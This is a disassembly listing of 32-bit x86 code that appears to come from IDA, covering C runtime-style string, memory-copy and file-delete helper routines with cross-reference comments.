loc_41BD21: ; CODE XREF: sub_41BBBD+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_41BC92
; ---------------------------------------------------------------------------
loc_41BD2E: ; CODE XREF: sub_41BBBD+125�j
; sub_41BBBD+139�j
mov ecx, [ebp+arg_C]
dec [ebp+var_4]
mov edx, [ebp+arg_4]
test cl, 8
jnz short loc_41BD4C
test edx, edx
jz short loc_41BD46
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_41BD46: ; CODE XREF: sub_41BBBD+181�j
and [ebp+var_8], 0
jmp short loc_41BD99
; ---------------------------------------------------------------------------
loc_41BD4C: ; CODE XREF: sub_41BBBD+17D�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_41BD72
test cl, 1
jnz short loc_41BD99
and ecx, 2
jz short loc_41BD69
cmp [ebp+var_8], 80000000h
ja short loc_41BD72
loc_41BD69: ; CODE XREF: sub_41BBBD+1A1�j
test ecx, ecx
jnz short loc_41BD99
cmp [ebp+var_8], eax
jbe short loc_41BD99
loc_41BD72: ; CODE XREF: sub_41BBBD+197�j
; sub_41BBBD+1AA�j
test byte ptr [ebp+arg_C], 1
mov ds:dword_4DB958, 22h
jz short loc_41BD88
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_41BD99
; ---------------------------------------------------------------------------
loc_41BD88: ; CODE XREF: sub_41BBBD+1C3�j
mov ecx, [ebp+arg_C]
and cl, 2
neg cl
sbb ecx, ecx
neg ecx
add ecx, eax
mov [ebp+var_8], ecx
loc_41BD99: ; CODE XREF: sub_41BBBD+18D�j
; sub_41BBBD+19C�j ...
test edx, edx
jz short loc_41BDA2
mov eax, [ebp+var_4]
mov [edx], eax
loc_41BDA2: ; CODE XREF: sub_41BBBD+1DE�j
test byte ptr [ebp+arg_C], 2
jz short loc_41BDB0
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_41BDB0: ; CODE XREF: sub_41BBBD+1E9�j
mov eax, [ebp+var_8]
jmp short loc_41BDC0
; ---------------------------------------------------------------------------
loc_41BDB5: ; CODE XREF: sub_41BBBD+66�j
; sub_41BBBD+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41BDBE
mov [eax], edi
loc_41BDBE: ; CODE XREF: sub_41BBBD+1FD�j
xor eax, eax
loc_41BDC0: ; CODE XREF: sub_41BBBD+1F6�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BBBD endp
; =============== S U B R O U T I N E =======================================
sub_41BDC5 proc near ; CODE XREF: sub_401ACD+61CF�p
; sub_401ACD+6A10�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41BBBD
add esp, 10h
retn
sub_41BDC5 endp
; =============== S U B R O U T I N E =======================================
sub_41BDDC proc near ; CODE XREF: sub_401ACD+5981�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_427080 ; DeleteFileA
test eax, eax
jnz short loc_41BDF2
call dword_42708C ; RtlGetLastWin32Error
jmp short loc_41BDF4
; ---------------------------------------------------------------------------
loc_41BDF2: ; CODE XREF: sub_41BDDC+C�j
xor eax, eax
loc_41BDF4: ; CODE XREF: sub_41BDDC+14�j
test eax, eax
jz short loc_41BE03
push eax
call sub_4203DF
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41BE03: ; CODE XREF: sub_41BDDC+1A�j
xor eax, eax
retn
sub_41BDDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE06 proc near ; CODE XREF: sub_401ACD+58D3�p
; sub_411C14+8E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call sub_420446
mov esi, eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41F69F
push [ebp+arg_0]
mov edi, eax
push esi
call sub_4204D3
add esp, 18h
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_41BE06 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE40 proc near ; CODE XREF: sub_401ACD+1E82�p
; sub_401ACD+1EA1�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_41BE61
xor eax, eax
jmp short loc_41BE63
; ---------------------------------------------------------------------------
loc_41BE61: ; CODE XREF: sub_41BE40+1B�j
mov eax, edi
loc_41BE63: ; CODE XREF: sub_41BE40+1F�j
cld
pop edi
leave
retn
sub_41BE40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE70 proc near ; CODE XREF: sub_401ACD+870�p
; sub_41DC8A+93�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_41BEA1
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_41BE9F
jz short loc_41BEA1
dec ecx
dec ecx
loc_41BE9F: ; CODE XREF: sub_41BE70+29�j
not ecx
loc_41BEA1: ; CODE XREF: sub_41BE70+9�j
; sub_41BE70+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_41BE70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BEB0 proc near ; CODE XREF: sub_401ACD+42F�p
; sub_401ACD+2FFD�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_41BF21
sub_41BEB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BEC0 proc near ; CODE XREF: sub_401ACD+438�p
; sub_401ACD+75FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_41BEDC
loc_41BECD: ; CODE XREF: sub_41BEC0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_41BF0F
test ecx, 3
jnz short loc_41BECD
loc_41BEDC: ; CODE XREF: sub_41BEC0+B�j
; sub_41BEC0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41BEDC
mov eax, [ecx-4]
test al, al
jz short loc_41BF1E
test ah, ah
jz short loc_41BF19
test eax, 0FF0000h
jz short loc_41BF14
test eax, 0FF000000h
jz short loc_41BF0F
jmp short loc_41BEDC
; ---------------------------------------------------------------------------
loc_41BF0F: ; CODE XREF: sub_41BEC0+12�j
; sub_41BEC0+4B�j
lea edi, [ecx-1]
jmp short loc_41BF21
; ---------------------------------------------------------------------------
loc_41BF14: ; CODE XREF: sub_41BEC0+44�j
lea edi, [ecx-2]
jmp short loc_41BF21
; ---------------------------------------------------------------------------
loc_41BF19: ; CODE XREF: sub_41BEC0+3D�j
lea edi, [ecx-3]
jmp short loc_41BF21
; ---------------------------------------------------------------------------
loc_41BF1E: ; CODE XREF: sub_41BEC0+39�j
lea edi, [ecx-4]
loc_41BF21: ; CODE XREF: sub_41BEB0+5�j
; sub_41BEC0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_41BF46
loc_41BF2D: ; CODE XREF: sub_41BEC0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_41BF98
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_41BF2D
jmp short loc_41BF46
; ---------------------------------------------------------------------------
loc_41BF41: ; CODE XREF: sub_41BEC0+9E�j
; sub_41BEC0+B8�j
mov [edi], edx
add edi, 4
loc_41BF46: ; CODE XREF: sub_41BEC0+6B�j
; sub_41BEC0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_41BF41
test dl, dl
jz short loc_41BF98
test dh, dh
jz short loc_41BF8F
test edx, 0FF0000h
jz short loc_41BF82
test edx, 0FF000000h
jz short loc_41BF7A
jmp short loc_41BF41
; ---------------------------------------------------------------------------
loc_41BF7A: ; CODE XREF: sub_41BEC0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41BF82: ; CODE XREF: sub_41BEC0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_41BF8F: ; CODE XREF: sub_41BEC0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41BF98: ; CODE XREF: sub_41BEC0+72�j
; sub_41BEC0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_41BEC0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41BFB0
loc_41BFA0: ; CODE XREF: sub_41BFB0+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_41BFB0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BFB0 proc near ; CODE XREF: sub_401ACD+414�p
; sub_401ACD+4C3�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 0041BFA0 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_41BFB6: ; CODE XREF: sub_41B900+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_41BFDB
loc_41BFC8: ; CODE XREF: sub_41BFB0+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_41BFA0
test cl, cl
jz short loc_41C024
test edx, 3
jnz short loc_41BFC8
loc_41BFDB: ; CODE XREF: sub_41BFB0+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_41BFE6: ; CODE XREF: sub_41BFB0+61�j
; sub_41BFB0+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_41C028
and eax, 81010100h
jz short loc_41BFE6
and eax, 1010100h
jnz short loc_41C022
and esi, 80000000h
jnz short loc_41BFE6
loc_41C022: ; CODE XREF: sub_41BFB0+68�j
; sub_41BFB0+81�j ...
pop esi
pop edi
loc_41C024: ; CODE XREF: sub_41BFB0+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C028: ; CODE XREF: sub_41BFB0+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_41C065
test al, al
jz short loc_41C022
cmp ah, bl
jz short loc_41C05E
test ah, ah
jz short loc_41C022
shr eax, 10h
cmp al, bl
jz short loc_41C057
test al, al
jz short loc_41C022
cmp ah, bl
jz short loc_41C050
test ah, ah
jz short loc_41C022
jmp short loc_41BFE6
; ---------------------------------------------------------------------------
loc_41C050: ; CODE XREF: sub_41BFB0+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41C057: ; CODE XREF: sub_41BFB0+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41C05E: ; CODE XREF: sub_41BFB0+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41C065: ; CODE XREF: sub_41BFB0+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_41BFB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41C070 proc near ; CODE XREF: sub_401ACD+1AE�p
; sub_401ACD+205�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41C0BC
loc_41C080: ; CODE XREF: sub_41C070+3C�j
; sub_41C070+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_41C0B4
or al, al
jz short loc_41C0B0
cmp ah, [ecx+1]
jnz short loc_41C0B4
or ah, ah
jz short loc_41C0B0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_41C0B4
or al, al
jz short loc_41C0B0
cmp ah, [ecx+3]
jnz short loc_41C0B4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_41C080
mov edi, edi
loc_41C0B0: ; CODE XREF: sub_41C070+18�j
; sub_41C070+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41C0B4: ; CODE XREF: sub_41C070+14�j
; sub_41C070+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41C0BC: ; CODE XREF: sub_41C070+E�j
test edx, 1
jz short loc_41C0D8
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_41C0B4
inc ecx
or al, al
jz short loc_41C0B0
test edx, 2
jz short loc_41C080
loc_41C0D8: ; CODE XREF: sub_41C070+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_41C0B4
or al, al
jz short loc_41C0B0
cmp ah, [ecx+1]
jnz short loc_41C0B4
or ah, ah
jz short loc_41C0B0
add ecx, 2
jmp short loc_41C080
sub_41C070 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C0F4 proc near ; CODE XREF: sub_401ACD+B5�p
; sub_401ACD+D5�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_41C10D: ; CODE XREF: sub_41C0F4+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_41C10D
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_41C135
mov edx, ds:dword_4DB9A4
loc_41C135: ; CODE XREF: sub_41C0F4+39�j
; sub_41C0F4+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_41C155
test al, al
jz short loc_41C155
inc edx
jmp short loc_41C135
; ---------------------------------------------------------------------------
loc_41C155: ; CODE XREF: sub_41C0F4+58�j
; sub_41C0F4+5C�j
mov ebx, edx
loc_41C157: ; CODE XREF: sub_41C0F4+81�j
mov al, [edx]
test al, al
jz short loc_41C17B
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_41C177
inc edx
jmp short loc_41C157
; ---------------------------------------------------------------------------
loc_41C177: ; CODE XREF: sub_41C0F4+7E�j
and byte ptr [edx], 0
inc edx
loc_41C17B: ; CODE XREF: sub_41C0F4+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov ds:dword_4DB9A4, edx
and eax, ebx
pop ebx
leave
retn
sub_41C0F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C190 proc near ; CODE XREF: sub_409A2D+1C�p
; sub_415221+19�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_41F69F
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41C1CE
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41C1DB
; ---------------------------------------------------------------------------
loc_41C1CE: ; CODE XREF: sub_41C190+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41F58A
pop ecx
pop ecx
loc_41C1DB: ; CODE XREF: sub_41C190+3C�j
mov eax, esi
pop esi
leave
retn
sub_41C190 endp
; =============== S U B R O U T I N E =======================================
sub_41C1E0 proc near ; CODE XREF: sub_40AFEB+88�p
; sub_40B64B+60�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_41C294
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_41C20A
loc_41C1FB: ; CODE XREF: sub_41C1E0+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_41C23B
test edi, 3
jnz short loc_41C1FB
loc_41C20A: ; CODE XREF: sub_41C1E0+19�j
; sub_41C1E0+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_41C20A
mov eax, [edi-4]
test al, al
jz short loc_41C248
test ah, ah
jz short loc_41C243
test eax, 0FF0000h
jz short loc_41C23E
test eax, 0FF000000h
jnz short loc_41C20A
loc_41C23B: ; CODE XREF: sub_41C1E0+20�j
dec edi
jmp short loc_41C24B
; ---------------------------------------------------------------------------
loc_41C23E: ; CODE XREF: sub_41C1E0+52�j
sub edi, 2
jmp short loc_41C24B
; ---------------------------------------------------------------------------
loc_41C243: ; CODE XREF: sub_41C1E0+4B�j
sub edi, 3
jmp short loc_41C24B
; ---------------------------------------------------------------------------
loc_41C248: ; CODE XREF: sub_41C1E0+47�j
sub edi, 4
loc_41C24B: ; CODE XREF: sub_41C1E0+5C�j
; sub_41C1E0+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_41C260
mov ebx, ecx
shr ecx, 2
jnz short loc_41C2AC
jmp short loc_41C27C
; ---------------------------------------------------------------------------
loc_41C260: ; CODE XREF: sub_41C1E0+75�j
; sub_41C1E0+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_41C29A
mov [edi], dl
inc edi
dec ecx
jz short loc_41C290
test esi, 3
jnz short loc_41C260
mov ebx, ecx
shr ecx, 2
jnz short loc_41C2AC
loc_41C27C: ; CODE XREF: sub_41C1E0+7E�j
; sub_41C1E0+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_41C290
loc_41C283: ; CODE XREF: sub_41C1E0+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_41C292
dec ecx
jnz short loc_41C283
loc_41C290: ; CODE XREF: sub_41C1E0+8B�j
; sub_41C1E0+A1�j
mov [edi], cl
loc_41C292: ; CODE XREF: sub_41C1E0+AB�j
pop ebx
pop esi
loc_41C294: ; CODE XREF: sub_41C1E0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C29A: ; CODE XREF: sub_41C1E0+85�j
; sub_41C1E0+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C2A4: ; CODE XREF: sub_41C1E0+E4�j
; sub_41C1E0+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_41C27C
loc_41C2AC: ; CODE XREF: sub_41C1E0+7C�j
; sub_41C1E0+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_41C2A4
test dl, dl
jz short loc_41C29A
test dh, dh
jz short loc_41C2F8
test edx, 0FF0000h
jz short loc_41C2E8
test edx, 0FF000000h
jnz short loc_41C2A4
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C2E8: ; CODE XREF: sub_41C1E0+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C2F8: ; CODE XREF: sub_41C1E0+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_41C1E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C310 proc near ; CODE XREF: sub_40BFA4+15�p
; sub_40BFA4+3B�p ...
var_3A3BFFC0 = byte ptr -3A3BFFC0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41C330
cmp edi, eax
jb loc_41C4A8
loc_41C330: ; CODE XREF: sub_41C310+16�j
test edi, 3
jnz short loc_41C34C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41C36C
rep movsd
jmp off_41C458[edx*4]
; ---------------------------------------------------------------------------
loc_41C34C: ; CODE XREF: sub_41C310+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41C364
and eax, 3
add ecx, eax
jmp dword ptr loc_41C36C+4[eax*4]
; ---------------------------------------------------------------------------
loc_41C364: ; CODE XREF: sub_41C310+46�j
jmp dword ptr loc_41C468[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41C36C: ; CODE XREF: sub_41C310+31�j
; sub_41C310+8E�j ...
jmp off_41C3EC[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41C380
; ---------------------------------------------------------------------------
lodsb
retn
; ---------------------------------------------------------------------------
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
loc_41C380: ; DATA XREF: sub_41C310+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41C36C
rep movsd
jmp off_41C458[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41C36C
rep movsd
jmp off_41C458[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41C36C
rep movsd
jmp off_41C458[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41C3EC dd offset loc_41C44F ; DATA XREF: sub_41C310:loc_41C36C�r
dd offset loc_41C43C
dd offset loc_41C434
dd offset loc_41C42C
dd offset loc_41C424
dd offset loc_41C41C
dd offset loc_41C414
dd offset loc_41C40C
; ---------------------------------------------------------------------------
loc_41C40C: ; CODE XREF: sub_41C310:loc_41C36C�j
; DATA XREF: sub_41C310+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41C414: ; CODE XREF: sub_41C310:loc_41C36C�j
; DATA XREF: sub_41C310+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41C41C: ; CODE XREF: sub_41C310:loc_41C36C�j
; DATA XREF: sub_41C310+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41C424: ; CODE XREF: sub_41C310:loc_41C36C�j
; DATA XREF: sub_41C310+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41C42C: ; CODE XREF: sub_41C310:loc_41C36C�j
; DATA XREF: sub_41C310+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41C434: ; CODE XREF: sub_41C310:loc_41C36C�j
; DATA XREF: sub_41C310+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41C43C: ; CODE XREF: sub_41C310:loc_41C36C�j
; DATA XREF: sub_41C310+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41C44F: ; CODE XREF: sub_41C310:loc_41C36C�j
; DATA XREF: sub_41C310:off_41C3EC�o
jmp off_41C458[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41C458 dd offset loc_41C468 ; DATA XREF: sub_41C310+35�r
; sub_41C310+92�r ...
dd offset loc_41C470
dd offset loc_41C47C
dd offset loc_41C490
; ---------------------------------------------------------------------------
loc_41C468: ; CODE XREF: sub_41C310+35�j
; sub_41C310+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41C470: ; CODE XREF: sub_41C310+35�j
; sub_41C310+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41C47C: ; CODE XREF: sub_41C310+35�j
; sub_41C310+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41C490: ; CODE XREF: sub_41C310+35�j
; sub_41C310+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41C4A8: ; CODE XREF: sub_41C310+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41C4DC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41C4D0
std
rep movsd
cld
jmp off_41C5F0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41C4D0: ; CODE XREF: sub_41C310+1B1�j
; sub_41C310+208�j ...
neg ecx
jmp dword ptr loc_41C59F+1[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41C4DC: ; CODE XREF: sub_41C310+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41C4F4
and eax, 3
sub ecx, eax
jmp dword ptr loc_41C4F4+4[eax*4]
; ---------------------------------------------------------------------------
loc_41C4F4: ; CODE XREF: sub_41C310+1D6�j
; DATA XREF: sub_41C310+1DD�r
jmp off_41C5F0[ecx*4]
; ---------------------------------------------------------------------------
align 4
or ch, al
inc ecx
add [eax], ch
lds eax, [ecx+0]
push eax
lds eax, [ecx+0]
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_41C4D0
std
rep movsd
cld
jmp off_41C5F0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41C4D0
std
rep movsd
cld
jmp off_41C5F0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41C4D0
std
rep movsd
cld
jmp off_41C5F0[edx*4]
; ---------------------------------------------------------------------------
align 4
movsb
lds eax, [ecx+0]
lodsb
lds eax, [ecx+0]
mov ah, 0C5h
inc ecx
add [ebp+eax*8-3A3BFFBFh], bh
inc ecx
add ah, cl
lds eax, [ecx+0]
aam 0C5h
inc ecx
loc_41C59F: ; DATA XREF: sub_41C310+1C2�r
add bh, ah
lds eax, [ecx+0]
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41C5E7: ; CODE XREF: sub_41C310+1C2�j
jmp off_41C5F0[edx*4]
; ---------------------------------------------------------------------------
align 10h
